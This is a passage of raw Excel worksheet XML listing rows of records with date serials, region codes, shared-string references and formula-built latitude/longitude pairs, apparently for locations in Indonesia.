      </c>
      <c r="H4121" t="s">
        <v>9262</v>
      </c>
      <c r="I4121" t="s">
        <v>10245</v>
      </c>
      <c r="J4121" t="s">
        <v>7436</v>
      </c>
      <c r="L4121" t="s">
        <v>14025</v>
      </c>
      <c r="M4121">
        <v>6171010006</v>
      </c>
      <c r="N4121">
        <v>6171010</v>
      </c>
      <c r="O4121">
        <v>6171</v>
      </c>
      <c r="P4121">
        <v>61</v>
      </c>
      <c r="Q4121" t="s">
        <v>3526</v>
      </c>
      <c r="R4121" t="s">
        <v>7788</v>
      </c>
      <c r="S4121" t="s">
        <v>7789</v>
      </c>
      <c r="T4121" t="s">
        <v>7441</v>
      </c>
      <c r="U4121" s="5">
        <v>1093178916</v>
      </c>
      <c r="V4121" s="5" t="s">
        <v>18182</v>
      </c>
      <c r="W4121" s="5">
        <v>-534725</v>
      </c>
      <c r="X4121" t="s">
        <v>21915</v>
      </c>
      <c r="Y4121" t="str">
        <f t="shared" si="64"/>
        <v>-5.34725,109.3178916</v>
      </c>
    </row>
    <row r="4122" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4122">
        <v>299385</v>
      </c>
      <c r="B4122" s="1">
        <v>44534</v>
      </c>
      <c r="C4122" t="s">
        <v>14026</v>
      </c>
      <c r="D4122" t="s">
        <v>22</v>
      </c>
      <c r="E4122" t="s">
        <v>23</v>
      </c>
      <c r="F4122" t="s">
        <v>14027</v>
      </c>
      <c r="G4122" t="s">
        <v>14028</v>
      </c>
      <c r="H4122" t="s">
        <v>9262</v>
      </c>
      <c r="I4122" t="s">
        <v>14029</v>
      </c>
      <c r="J4122" t="s">
        <v>2622</v>
      </c>
      <c r="L4122" t="s">
        <v>14030</v>
      </c>
      <c r="M4122">
        <v>3507090013</v>
      </c>
      <c r="N4122">
        <v>3507090</v>
      </c>
      <c r="O4122">
        <v>3507</v>
      </c>
      <c r="P4122">
        <v>35</v>
      </c>
      <c r="Q4122" t="s">
        <v>9477</v>
      </c>
      <c r="R4122" t="s">
        <v>13767</v>
      </c>
      <c r="S4122" t="s">
        <v>6321</v>
      </c>
      <c r="T4122" t="s">
        <v>1221</v>
      </c>
      <c r="U4122" s="5">
        <v>1129222924</v>
      </c>
      <c r="V4122" s="5" t="s">
        <v>18183</v>
      </c>
      <c r="W4122" s="5">
        <v>-81079379</v>
      </c>
      <c r="X4122" t="s">
        <v>21916</v>
      </c>
      <c r="Y4122" t="str">
        <f t="shared" si="64"/>
        <v>-8.1079379,112.9222924</v>
      </c>
    </row>
    <row r="4123" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4123">
        <v>299386</v>
      </c>
      <c r="B4123" s="1">
        <v>44534</v>
      </c>
      <c r="C4123" t="s">
        <v>14031</v>
      </c>
      <c r="D4123" t="s">
        <v>22</v>
      </c>
      <c r="E4123" t="s">
        <v>23</v>
      </c>
      <c r="F4123" t="s">
        <v>14032</v>
      </c>
      <c r="H4123" t="s">
        <v>9262</v>
      </c>
      <c r="I4123" t="s">
        <v>14033</v>
      </c>
      <c r="J4123" t="s">
        <v>2622</v>
      </c>
      <c r="L4123" t="s">
        <v>14034</v>
      </c>
      <c r="M4123">
        <v>3507090013</v>
      </c>
      <c r="N4123">
        <v>3507090</v>
      </c>
      <c r="O4123">
        <v>3507</v>
      </c>
      <c r="P4123">
        <v>35</v>
      </c>
      <c r="Q4123" t="s">
        <v>9477</v>
      </c>
      <c r="R4123" t="s">
        <v>13767</v>
      </c>
      <c r="S4123" t="s">
        <v>6321</v>
      </c>
      <c r="T4123" t="s">
        <v>1221</v>
      </c>
      <c r="U4123" s="5">
        <v>1129220027</v>
      </c>
      <c r="V4123" s="5" t="s">
        <v>18184</v>
      </c>
      <c r="W4123" s="5">
        <v>-81079246</v>
      </c>
      <c r="X4123" t="s">
        <v>21917</v>
      </c>
      <c r="Y4123" t="str">
        <f t="shared" si="64"/>
        <v>-8.1079246,112.9220027</v>
      </c>
    </row>
    <row r="4124" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4124">
        <v>299387</v>
      </c>
      <c r="B4124" s="1">
        <v>44534</v>
      </c>
      <c r="C4124" t="s">
        <v>14035</v>
      </c>
      <c r="D4124" t="s">
        <v>22</v>
      </c>
      <c r="E4124" t="s">
        <v>23</v>
      </c>
      <c r="F4124" t="s">
        <v>14036</v>
      </c>
      <c r="G4124" t="s">
        <v>14037</v>
      </c>
      <c r="H4124" t="s">
        <v>26</v>
      </c>
      <c r="I4124" t="s">
        <v>137</v>
      </c>
      <c r="J4124" t="s">
        <v>6940</v>
      </c>
      <c r="L4124" t="s">
        <v>14038</v>
      </c>
      <c r="M4124">
        <v>1172010007</v>
      </c>
      <c r="N4124">
        <v>1172010</v>
      </c>
      <c r="O4124">
        <v>1172</v>
      </c>
      <c r="P4124">
        <v>11</v>
      </c>
      <c r="Q4124" t="s">
        <v>14039</v>
      </c>
      <c r="R4124" t="s">
        <v>10178</v>
      </c>
      <c r="S4124" t="s">
        <v>14040</v>
      </c>
      <c r="T4124" t="s">
        <v>6945</v>
      </c>
      <c r="U4124" s="5">
        <v>953303647</v>
      </c>
      <c r="V4124" s="5" t="s">
        <v>18185</v>
      </c>
      <c r="W4124" s="5">
        <v>58837110</v>
      </c>
      <c r="X4124" t="s">
        <v>21918</v>
      </c>
      <c r="Y4124" t="str">
        <f t="shared" si="64"/>
        <v>5.8837110,953.303647</v>
      </c>
    </row>
    <row r="4125" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4125">
        <v>299388</v>
      </c>
      <c r="B4125" s="1">
        <v>44535</v>
      </c>
      <c r="C4125" t="s">
        <v>14041</v>
      </c>
      <c r="D4125" t="s">
        <v>22</v>
      </c>
      <c r="E4125" t="s">
        <v>23</v>
      </c>
      <c r="F4125" t="s">
        <v>14042</v>
      </c>
      <c r="H4125" t="s">
        <v>9262</v>
      </c>
      <c r="I4125" t="s">
        <v>12552</v>
      </c>
      <c r="J4125" t="s">
        <v>2622</v>
      </c>
      <c r="L4125" t="s">
        <v>14043</v>
      </c>
      <c r="M4125">
        <v>3507090013</v>
      </c>
      <c r="N4125">
        <v>3507090</v>
      </c>
      <c r="O4125">
        <v>3507</v>
      </c>
      <c r="P4125">
        <v>35</v>
      </c>
      <c r="Q4125" t="s">
        <v>9477</v>
      </c>
      <c r="R4125" t="s">
        <v>13767</v>
      </c>
      <c r="S4125" t="s">
        <v>6321</v>
      </c>
      <c r="T4125" t="s">
        <v>1221</v>
      </c>
      <c r="U4125" s="5">
        <v>1129222711</v>
      </c>
      <c r="V4125" s="5" t="s">
        <v>18186</v>
      </c>
      <c r="W4125" s="5">
        <v>-81078943</v>
      </c>
      <c r="X4125" t="s">
        <v>21919</v>
      </c>
      <c r="Y4125" t="str">
        <f t="shared" si="64"/>
        <v>-8.1078943,112.9222711</v>
      </c>
    </row>
    <row r="4126" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4126">
        <v>299389</v>
      </c>
      <c r="B4126" s="1">
        <v>44536</v>
      </c>
      <c r="C4126" t="s">
        <v>14044</v>
      </c>
      <c r="D4126" t="s">
        <v>22</v>
      </c>
      <c r="E4126" t="s">
        <v>23</v>
      </c>
      <c r="F4126" t="s">
        <v>14045</v>
      </c>
      <c r="G4126" t="s">
        <v>14046</v>
      </c>
      <c r="H4126" t="s">
        <v>26</v>
      </c>
      <c r="I4126" t="s">
        <v>788</v>
      </c>
      <c r="J4126" t="s">
        <v>6707</v>
      </c>
      <c r="L4126" t="s">
        <v>14047</v>
      </c>
      <c r="M4126">
        <v>5271021007</v>
      </c>
      <c r="N4126">
        <v>5271021</v>
      </c>
      <c r="O4126">
        <v>5271</v>
      </c>
      <c r="P4126">
        <v>52</v>
      </c>
      <c r="Q4126" t="s">
        <v>14048</v>
      </c>
      <c r="R4126" t="s">
        <v>14049</v>
      </c>
      <c r="S4126" t="s">
        <v>2153</v>
      </c>
      <c r="T4126" t="s">
        <v>2154</v>
      </c>
      <c r="U4126" s="5">
        <v>1161123411</v>
      </c>
      <c r="V4126" s="5" t="s">
        <v>18187</v>
      </c>
      <c r="W4126" s="5">
        <v>-85607252</v>
      </c>
      <c r="X4126" t="s">
        <v>21920</v>
      </c>
      <c r="Y4126" t="str">
        <f t="shared" si="64"/>
        <v>-8.5607252,116.1123411</v>
      </c>
    </row>
    <row r="4127" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4127">
        <v>299391</v>
      </c>
      <c r="B4127" s="1">
        <v>44536</v>
      </c>
      <c r="C4127" t="s">
        <v>14050</v>
      </c>
      <c r="D4127" t="s">
        <v>22</v>
      </c>
      <c r="E4127" t="s">
        <v>23</v>
      </c>
      <c r="F4127" t="s">
        <v>14051</v>
      </c>
      <c r="G4127" t="s">
        <v>14052</v>
      </c>
      <c r="H4127" t="s">
        <v>26</v>
      </c>
      <c r="I4127" t="s">
        <v>27</v>
      </c>
      <c r="J4127" t="s">
        <v>6509</v>
      </c>
      <c r="L4127" t="s">
        <v>14053</v>
      </c>
      <c r="M4127">
        <v>6304140007</v>
      </c>
      <c r="N4127">
        <v>6304140</v>
      </c>
      <c r="O4127">
        <v>6304</v>
      </c>
      <c r="P4127">
        <v>63</v>
      </c>
      <c r="Q4127" t="s">
        <v>14054</v>
      </c>
      <c r="R4127" t="s">
        <v>11918</v>
      </c>
      <c r="S4127" t="s">
        <v>8851</v>
      </c>
      <c r="T4127" t="s">
        <v>6513</v>
      </c>
      <c r="U4127" s="5">
        <v>1147122364</v>
      </c>
      <c r="V4127" s="5" t="s">
        <v>18188</v>
      </c>
      <c r="W4127" s="5">
        <v>-28658246</v>
      </c>
      <c r="X4127" t="s">
        <v>21921</v>
      </c>
      <c r="Y4127" t="str">
        <f t="shared" si="64"/>
        <v>-2.8658246,114.7122364</v>
      </c>
    </row>
    <row r="4128" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4128">
        <v>299392</v>
      </c>
      <c r="B4128" s="1">
        <v>44536</v>
      </c>
      <c r="C4128" t="s">
        <v>14055</v>
      </c>
      <c r="D4128" t="s">
        <v>22</v>
      </c>
      <c r="E4128" t="s">
        <v>23</v>
      </c>
      <c r="F4128" t="s">
        <v>14056</v>
      </c>
      <c r="H4128" t="s">
        <v>26</v>
      </c>
      <c r="I4128" t="s">
        <v>1633</v>
      </c>
      <c r="J4128" t="s">
        <v>7277</v>
      </c>
      <c r="L4128" t="s">
        <v>14057</v>
      </c>
      <c r="M4128">
        <v>5103020003</v>
      </c>
      <c r="N4128">
        <v>5103020</v>
      </c>
      <c r="O4128">
        <v>5103</v>
      </c>
      <c r="P4128">
        <v>51</v>
      </c>
      <c r="Q4128" t="s">
        <v>7280</v>
      </c>
      <c r="R4128" t="s">
        <v>7280</v>
      </c>
      <c r="S4128" t="s">
        <v>7281</v>
      </c>
      <c r="T4128" t="s">
        <v>7282</v>
      </c>
      <c r="U4128" s="5">
        <v>1151861980</v>
      </c>
      <c r="V4128" s="5" t="s">
        <v>18189</v>
      </c>
      <c r="W4128" s="5">
        <v>-87147308</v>
      </c>
      <c r="X4128" t="s">
        <v>21922</v>
      </c>
      <c r="Y4128" t="str">
        <f t="shared" si="64"/>
        <v>-8.7147308,115.1861980</v>
      </c>
    </row>
    <row r="4129" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4129">
        <v>299398</v>
      </c>
      <c r="B4129" s="1">
        <v>44536</v>
      </c>
      <c r="C4129" t="s">
        <v>14058</v>
      </c>
      <c r="D4129" t="s">
        <v>22</v>
      </c>
      <c r="E4129" t="s">
        <v>23</v>
      </c>
      <c r="F4129" t="s">
        <v>14059</v>
      </c>
      <c r="G4129" t="s">
        <v>14060</v>
      </c>
      <c r="H4129" t="s">
        <v>26</v>
      </c>
      <c r="I4129" t="s">
        <v>1542</v>
      </c>
      <c r="J4129" t="s">
        <v>6626</v>
      </c>
      <c r="M4129">
        <v>7371031006</v>
      </c>
      <c r="N4129">
        <v>7371031</v>
      </c>
      <c r="O4129">
        <v>7371</v>
      </c>
      <c r="P4129">
        <v>73</v>
      </c>
      <c r="Q4129" t="s">
        <v>14061</v>
      </c>
      <c r="R4129" t="s">
        <v>14062</v>
      </c>
      <c r="S4129" t="s">
        <v>6629</v>
      </c>
      <c r="T4129" t="s">
        <v>6630</v>
      </c>
      <c r="U4129" s="5">
        <v>1194413424</v>
      </c>
      <c r="V4129" s="5" t="s">
        <v>18190</v>
      </c>
      <c r="W4129" s="5">
        <v>-51641426</v>
      </c>
      <c r="X4129" t="s">
        <v>21923</v>
      </c>
      <c r="Y4129" t="str">
        <f t="shared" si="64"/>
        <v>-5.1641426,119.4413424</v>
      </c>
    </row>
    <row r="4130" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4130">
        <v>299400</v>
      </c>
      <c r="B4130" s="1">
        <v>44537</v>
      </c>
      <c r="C4130" t="s">
        <v>14063</v>
      </c>
      <c r="D4130" t="s">
        <v>22</v>
      </c>
      <c r="E4130" t="s">
        <v>23</v>
      </c>
      <c r="F4130" t="s">
        <v>14064</v>
      </c>
      <c r="G4130" t="s">
        <v>14065</v>
      </c>
      <c r="H4130" t="s">
        <v>26</v>
      </c>
      <c r="I4130" t="s">
        <v>1263</v>
      </c>
      <c r="J4130" t="s">
        <v>6626</v>
      </c>
      <c r="L4130" t="s">
        <v>14066</v>
      </c>
      <c r="M4130">
        <v>7308022003</v>
      </c>
      <c r="N4130">
        <v>7308022</v>
      </c>
      <c r="O4130">
        <v>7308</v>
      </c>
      <c r="P4130">
        <v>73</v>
      </c>
      <c r="Q4130" t="s">
        <v>14067</v>
      </c>
      <c r="R4130" t="s">
        <v>14068</v>
      </c>
      <c r="S4130" t="s">
        <v>11996</v>
      </c>
      <c r="T4130" t="s">
        <v>6630</v>
      </c>
      <c r="U4130" s="5">
        <v>1195728350</v>
      </c>
      <c r="V4130" s="5" t="s">
        <v>18191</v>
      </c>
      <c r="W4130" s="5">
        <v>-50165885</v>
      </c>
      <c r="X4130" t="s">
        <v>21924</v>
      </c>
      <c r="Y4130" t="str">
        <f t="shared" si="64"/>
        <v>-5.0165885,119.5728350</v>
      </c>
    </row>
    <row r="4131" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4131">
        <v>299401</v>
      </c>
      <c r="B4131" s="1">
        <v>44537</v>
      </c>
      <c r="C4131" t="s">
        <v>14069</v>
      </c>
      <c r="D4131" t="s">
        <v>22</v>
      </c>
      <c r="E4131" t="s">
        <v>23</v>
      </c>
      <c r="F4131" t="s">
        <v>14070</v>
      </c>
      <c r="G4131" t="s">
        <v>14071</v>
      </c>
      <c r="H4131" t="s">
        <v>26</v>
      </c>
      <c r="I4131" t="s">
        <v>893</v>
      </c>
      <c r="J4131" t="s">
        <v>6626</v>
      </c>
      <c r="L4131" t="s">
        <v>14072</v>
      </c>
      <c r="M4131">
        <v>7309040017</v>
      </c>
      <c r="N4131">
        <v>7309040</v>
      </c>
      <c r="O4131">
        <v>7309</v>
      </c>
      <c r="P4131">
        <v>73</v>
      </c>
      <c r="Q4131" t="s">
        <v>14073</v>
      </c>
      <c r="R4131" t="s">
        <v>14074</v>
      </c>
      <c r="S4131" t="s">
        <v>14075</v>
      </c>
      <c r="T4131" t="s">
        <v>6630</v>
      </c>
      <c r="U4131" s="5">
        <v>1195467251</v>
      </c>
      <c r="V4131" s="5" t="s">
        <v>18192</v>
      </c>
      <c r="W4131" s="5">
        <v>-48333725</v>
      </c>
      <c r="X4131" t="s">
        <v>21925</v>
      </c>
      <c r="Y4131" t="str">
        <f t="shared" si="64"/>
        <v>-4.8333725,119.5467251</v>
      </c>
    </row>
    <row r="4132" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4132">
        <v>299402</v>
      </c>
      <c r="B4132" s="1">
        <v>44537</v>
      </c>
      <c r="C4132" t="s">
        <v>14076</v>
      </c>
      <c r="D4132" t="s">
        <v>22</v>
      </c>
      <c r="E4132" t="s">
        <v>23</v>
      </c>
      <c r="F4132" t="s">
        <v>14077</v>
      </c>
      <c r="G4132" t="s">
        <v>14078</v>
      </c>
      <c r="H4132" t="s">
        <v>26</v>
      </c>
      <c r="I4132" t="s">
        <v>1359</v>
      </c>
      <c r="J4132" t="s">
        <v>6626</v>
      </c>
      <c r="L4132" t="s">
        <v>14079</v>
      </c>
      <c r="M4132">
        <v>7371111001</v>
      </c>
      <c r="N4132">
        <v>7371111</v>
      </c>
      <c r="O4132">
        <v>7371</v>
      </c>
      <c r="P4132">
        <v>73</v>
      </c>
      <c r="Q4132" t="s">
        <v>7101</v>
      </c>
      <c r="R4132" t="s">
        <v>7102</v>
      </c>
      <c r="S4132" t="s">
        <v>6629</v>
      </c>
      <c r="T4132" t="s">
        <v>6630</v>
      </c>
      <c r="U4132" s="5">
        <v>1194894612</v>
      </c>
      <c r="V4132" s="5" t="s">
        <v>18193</v>
      </c>
      <c r="W4132" s="5">
        <v>-51380913</v>
      </c>
      <c r="X4132" t="s">
        <v>21926</v>
      </c>
      <c r="Y4132" t="str">
        <f t="shared" si="64"/>
        <v>-5.1380913,119.4894612</v>
      </c>
    </row>
    <row r="4133" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4133">
        <v>299403</v>
      </c>
      <c r="B4133" s="1">
        <v>44537</v>
      </c>
      <c r="C4133" t="s">
        <v>14080</v>
      </c>
      <c r="D4133" t="s">
        <v>22</v>
      </c>
      <c r="E4133" t="s">
        <v>23</v>
      </c>
      <c r="F4133" t="s">
        <v>14081</v>
      </c>
      <c r="G4133" t="s">
        <v>14082</v>
      </c>
      <c r="H4133" t="s">
        <v>26</v>
      </c>
      <c r="I4133" t="s">
        <v>882</v>
      </c>
      <c r="J4133" t="s">
        <v>6626</v>
      </c>
      <c r="L4133" t="s">
        <v>14083</v>
      </c>
      <c r="M4133">
        <v>7371100008</v>
      </c>
      <c r="N4133">
        <v>7371100</v>
      </c>
      <c r="O4133">
        <v>7371</v>
      </c>
      <c r="P4133">
        <v>73</v>
      </c>
      <c r="Q4133" t="s">
        <v>14084</v>
      </c>
      <c r="R4133" t="s">
        <v>8580</v>
      </c>
      <c r="S4133" t="s">
        <v>6629</v>
      </c>
      <c r="T4133" t="s">
        <v>6630</v>
      </c>
      <c r="U4133" s="5">
        <v>1194525647</v>
      </c>
      <c r="V4133" s="5" t="s">
        <v>18194</v>
      </c>
      <c r="W4133" s="5">
        <v>-51411902</v>
      </c>
      <c r="X4133" t="s">
        <v>21927</v>
      </c>
      <c r="Y4133" t="str">
        <f t="shared" si="64"/>
        <v>-5.1411902,119.4525647</v>
      </c>
    </row>
    <row r="4134" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4134">
        <v>299404</v>
      </c>
      <c r="B4134" s="1">
        <v>44537</v>
      </c>
      <c r="C4134" t="s">
        <v>14085</v>
      </c>
      <c r="D4134" t="s">
        <v>22</v>
      </c>
      <c r="E4134" t="s">
        <v>23</v>
      </c>
      <c r="F4134" t="s">
        <v>14086</v>
      </c>
      <c r="H4134" t="s">
        <v>26</v>
      </c>
      <c r="I4134" t="s">
        <v>1843</v>
      </c>
      <c r="J4134" t="s">
        <v>6626</v>
      </c>
      <c r="L4134" t="s">
        <v>14087</v>
      </c>
      <c r="M4134">
        <v>7308022006</v>
      </c>
      <c r="N4134">
        <v>7308022</v>
      </c>
      <c r="O4134">
        <v>7308</v>
      </c>
      <c r="P4134">
        <v>73</v>
      </c>
      <c r="Q4134" t="s">
        <v>14068</v>
      </c>
      <c r="R4134" t="s">
        <v>14068</v>
      </c>
      <c r="S4134" t="s">
        <v>11996</v>
      </c>
      <c r="T4134" t="s">
        <v>6630</v>
      </c>
      <c r="U4134" s="5">
        <v>1195798325</v>
      </c>
      <c r="V4134" s="5" t="s">
        <v>18195</v>
      </c>
      <c r="W4134" s="5">
        <v>-50068390</v>
      </c>
      <c r="X4134" t="s">
        <v>21928</v>
      </c>
      <c r="Y4134" t="str">
        <f t="shared" si="64"/>
        <v>-5.0068390,119.5798325</v>
      </c>
    </row>
    <row r="4135" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4135">
        <v>299405</v>
      </c>
      <c r="B4135" s="1">
        <v>44537</v>
      </c>
      <c r="C4135" t="s">
        <v>14088</v>
      </c>
      <c r="D4135" t="s">
        <v>22</v>
      </c>
      <c r="E4135" t="s">
        <v>23</v>
      </c>
      <c r="F4135" t="s">
        <v>14089</v>
      </c>
      <c r="H4135" t="s">
        <v>26</v>
      </c>
      <c r="I4135" t="s">
        <v>2165</v>
      </c>
      <c r="J4135" t="s">
        <v>6626</v>
      </c>
      <c r="L4135" t="s">
        <v>14090</v>
      </c>
      <c r="M4135">
        <v>7308030005</v>
      </c>
      <c r="N4135">
        <v>7308030</v>
      </c>
      <c r="O4135">
        <v>7308</v>
      </c>
      <c r="P4135">
        <v>73</v>
      </c>
      <c r="Q4135" t="s">
        <v>14091</v>
      </c>
      <c r="R4135" t="s">
        <v>14092</v>
      </c>
      <c r="S4135" t="s">
        <v>11996</v>
      </c>
      <c r="T4135" t="s">
        <v>6630</v>
      </c>
      <c r="U4135" s="5">
        <v>1195571242</v>
      </c>
      <c r="V4135" s="5" t="s">
        <v>18196</v>
      </c>
      <c r="W4135" s="5">
        <v>-49245200</v>
      </c>
      <c r="X4135" t="s">
        <v>21929</v>
      </c>
      <c r="Y4135" t="str">
        <f t="shared" si="64"/>
        <v>-4.9245200,119.5571242</v>
      </c>
    </row>
    <row r="4136" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4136">
        <v>299406</v>
      </c>
      <c r="B4136" s="1">
        <v>44537</v>
      </c>
      <c r="C4136" t="s">
        <v>14093</v>
      </c>
      <c r="D4136" t="s">
        <v>22</v>
      </c>
      <c r="E4136" t="s">
        <v>23</v>
      </c>
      <c r="F4136" t="s">
        <v>14094</v>
      </c>
      <c r="G4136" t="s">
        <v>14095</v>
      </c>
      <c r="H4136" t="s">
        <v>26</v>
      </c>
      <c r="I4136" t="s">
        <v>843</v>
      </c>
      <c r="J4136" t="s">
        <v>6626</v>
      </c>
      <c r="L4136" t="s">
        <v>14096</v>
      </c>
      <c r="M4136">
        <v>7371110004</v>
      </c>
      <c r="N4136">
        <v>7371110</v>
      </c>
      <c r="O4136">
        <v>7371</v>
      </c>
      <c r="P4136">
        <v>73</v>
      </c>
      <c r="Q4136" t="s">
        <v>14097</v>
      </c>
      <c r="R4136" t="s">
        <v>6628</v>
      </c>
      <c r="S4136" t="s">
        <v>6629</v>
      </c>
      <c r="T4136" t="s">
        <v>6630</v>
      </c>
      <c r="U4136" s="5">
        <v>1195348432</v>
      </c>
      <c r="V4136" s="5" t="s">
        <v>18197</v>
      </c>
      <c r="W4136" s="5">
        <v>-51259212</v>
      </c>
      <c r="X4136" t="s">
        <v>21930</v>
      </c>
      <c r="Y4136" t="str">
        <f t="shared" si="64"/>
        <v>-5.1259212,119.5348432</v>
      </c>
    </row>
    <row r="4137" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4137">
        <v>299407</v>
      </c>
      <c r="B4137" s="1">
        <v>44537</v>
      </c>
      <c r="C4137" t="s">
        <v>14098</v>
      </c>
      <c r="D4137" t="s">
        <v>22</v>
      </c>
      <c r="E4137" t="s">
        <v>23</v>
      </c>
      <c r="F4137" t="s">
        <v>14099</v>
      </c>
      <c r="G4137" t="s">
        <v>14100</v>
      </c>
      <c r="H4137" t="s">
        <v>26</v>
      </c>
      <c r="I4137" t="s">
        <v>137</v>
      </c>
      <c r="J4137" t="s">
        <v>6707</v>
      </c>
      <c r="L4137" t="s">
        <v>14101</v>
      </c>
      <c r="M4137">
        <v>5201061007</v>
      </c>
      <c r="N4137">
        <v>5201061</v>
      </c>
      <c r="O4137">
        <v>5201</v>
      </c>
      <c r="P4137">
        <v>52</v>
      </c>
      <c r="Q4137" t="s">
        <v>14102</v>
      </c>
      <c r="R4137" t="s">
        <v>14103</v>
      </c>
      <c r="S4137" t="s">
        <v>13758</v>
      </c>
      <c r="T4137" t="s">
        <v>2154</v>
      </c>
      <c r="U4137" s="5">
        <v>1160710502</v>
      </c>
      <c r="V4137" s="5" t="s">
        <v>18198</v>
      </c>
      <c r="W4137" s="5">
        <v>-85112942</v>
      </c>
      <c r="X4137" t="s">
        <v>21931</v>
      </c>
      <c r="Y4137" t="str">
        <f t="shared" si="64"/>
        <v>-8.5112942,116.0710502</v>
      </c>
    </row>
    <row r="4138" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4138">
        <v>299408</v>
      </c>
      <c r="B4138" s="1">
        <v>44537</v>
      </c>
      <c r="C4138" t="s">
        <v>14104</v>
      </c>
      <c r="D4138" t="s">
        <v>22</v>
      </c>
      <c r="E4138" t="s">
        <v>23</v>
      </c>
      <c r="F4138" t="s">
        <v>14105</v>
      </c>
      <c r="G4138" t="s">
        <v>14106</v>
      </c>
      <c r="H4138" t="s">
        <v>26</v>
      </c>
      <c r="I4138" t="s">
        <v>788</v>
      </c>
      <c r="J4138" t="s">
        <v>6626</v>
      </c>
      <c r="L4138" t="s">
        <v>14107</v>
      </c>
      <c r="M4138">
        <v>7306040013</v>
      </c>
      <c r="N4138">
        <v>7306040</v>
      </c>
      <c r="O4138">
        <v>7306</v>
      </c>
      <c r="P4138">
        <v>73</v>
      </c>
      <c r="Q4138" t="s">
        <v>14108</v>
      </c>
      <c r="R4138" t="s">
        <v>7167</v>
      </c>
      <c r="S4138" t="s">
        <v>7168</v>
      </c>
      <c r="T4138" t="s">
        <v>6630</v>
      </c>
      <c r="U4138" s="5">
        <v>1194680786</v>
      </c>
      <c r="V4138" s="5" t="s">
        <v>18199</v>
      </c>
      <c r="W4138" s="5">
        <v>-52045958</v>
      </c>
      <c r="X4138" t="s">
        <v>21932</v>
      </c>
      <c r="Y4138" t="str">
        <f t="shared" si="64"/>
        <v>-5.2045958,119.4680786</v>
      </c>
    </row>
    <row r="4139" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4139">
        <v>299411</v>
      </c>
      <c r="B4139" s="1">
        <v>44537</v>
      </c>
      <c r="C4139" t="s">
        <v>14109</v>
      </c>
      <c r="D4139" t="s">
        <v>22</v>
      </c>
      <c r="E4139" t="s">
        <v>23</v>
      </c>
      <c r="F4139" t="s">
        <v>14110</v>
      </c>
      <c r="G4139" t="s">
        <v>14111</v>
      </c>
      <c r="H4139" t="s">
        <v>26</v>
      </c>
      <c r="I4139" t="s">
        <v>3029</v>
      </c>
      <c r="J4139" t="s">
        <v>6626</v>
      </c>
      <c r="L4139" t="s">
        <v>14112</v>
      </c>
      <c r="M4139">
        <v>7308020005</v>
      </c>
      <c r="N4139">
        <v>7308020</v>
      </c>
      <c r="O4139">
        <v>7308</v>
      </c>
      <c r="P4139">
        <v>73</v>
      </c>
      <c r="Q4139" t="s">
        <v>14113</v>
      </c>
      <c r="R4139" t="s">
        <v>14114</v>
      </c>
      <c r="S4139" t="s">
        <v>11996</v>
      </c>
      <c r="T4139" t="s">
        <v>6630</v>
      </c>
      <c r="U4139" s="5">
        <v>1195647693</v>
      </c>
      <c r="V4139" s="5" t="s">
        <v>18200</v>
      </c>
      <c r="W4139" s="5">
        <v>-50116596</v>
      </c>
      <c r="X4139" t="s">
        <v>21933</v>
      </c>
      <c r="Y4139" t="str">
        <f t="shared" si="64"/>
        <v>-5.0116596,119.5647693</v>
      </c>
    </row>
    <row r="4140" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4140">
        <v>299413</v>
      </c>
      <c r="B4140" s="1">
        <v>44537</v>
      </c>
      <c r="C4140" t="s">
        <v>14115</v>
      </c>
      <c r="D4140" t="s">
        <v>22</v>
      </c>
      <c r="E4140" t="s">
        <v>23</v>
      </c>
      <c r="F4140" t="s">
        <v>14116</v>
      </c>
      <c r="H4140" t="s">
        <v>26</v>
      </c>
      <c r="I4140" t="s">
        <v>893</v>
      </c>
      <c r="J4140" t="s">
        <v>6712</v>
      </c>
      <c r="L4140" t="s">
        <v>14117</v>
      </c>
      <c r="M4140">
        <v>1904010007</v>
      </c>
      <c r="N4140">
        <v>1904010</v>
      </c>
      <c r="O4140">
        <v>1904</v>
      </c>
      <c r="P4140">
        <v>19</v>
      </c>
      <c r="Q4140" t="s">
        <v>14118</v>
      </c>
      <c r="R4140" t="s">
        <v>14119</v>
      </c>
      <c r="S4140" t="s">
        <v>14120</v>
      </c>
      <c r="T4140" t="s">
        <v>6718</v>
      </c>
      <c r="U4140" s="5">
        <v>1063956356</v>
      </c>
      <c r="V4140" s="5" t="s">
        <v>18201</v>
      </c>
      <c r="W4140" s="5">
        <v>-24816403</v>
      </c>
      <c r="X4140" t="s">
        <v>21934</v>
      </c>
      <c r="Y4140" t="str">
        <f t="shared" si="64"/>
        <v>-2.4816403,106.3956356</v>
      </c>
    </row>
    <row r="4141" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4141">
        <v>299415</v>
      </c>
      <c r="B4141" s="1">
        <v>44538</v>
      </c>
      <c r="C4141" t="s">
        <v>14121</v>
      </c>
      <c r="D4141" t="s">
        <v>22</v>
      </c>
      <c r="E4141" t="s">
        <v>23</v>
      </c>
      <c r="F4141" t="s">
        <v>14122</v>
      </c>
      <c r="G4141" t="s">
        <v>14123</v>
      </c>
      <c r="H4141" t="s">
        <v>26</v>
      </c>
      <c r="I4141" t="s">
        <v>974</v>
      </c>
      <c r="J4141" t="s">
        <v>7171</v>
      </c>
      <c r="L4141" t="s">
        <v>14124</v>
      </c>
      <c r="M4141">
        <v>6471010005</v>
      </c>
      <c r="N4141">
        <v>6471010</v>
      </c>
      <c r="O4141">
        <v>6471</v>
      </c>
      <c r="P4141">
        <v>64</v>
      </c>
      <c r="Q4141" t="s">
        <v>7661</v>
      </c>
      <c r="R4141" t="s">
        <v>1306</v>
      </c>
      <c r="S4141" t="s">
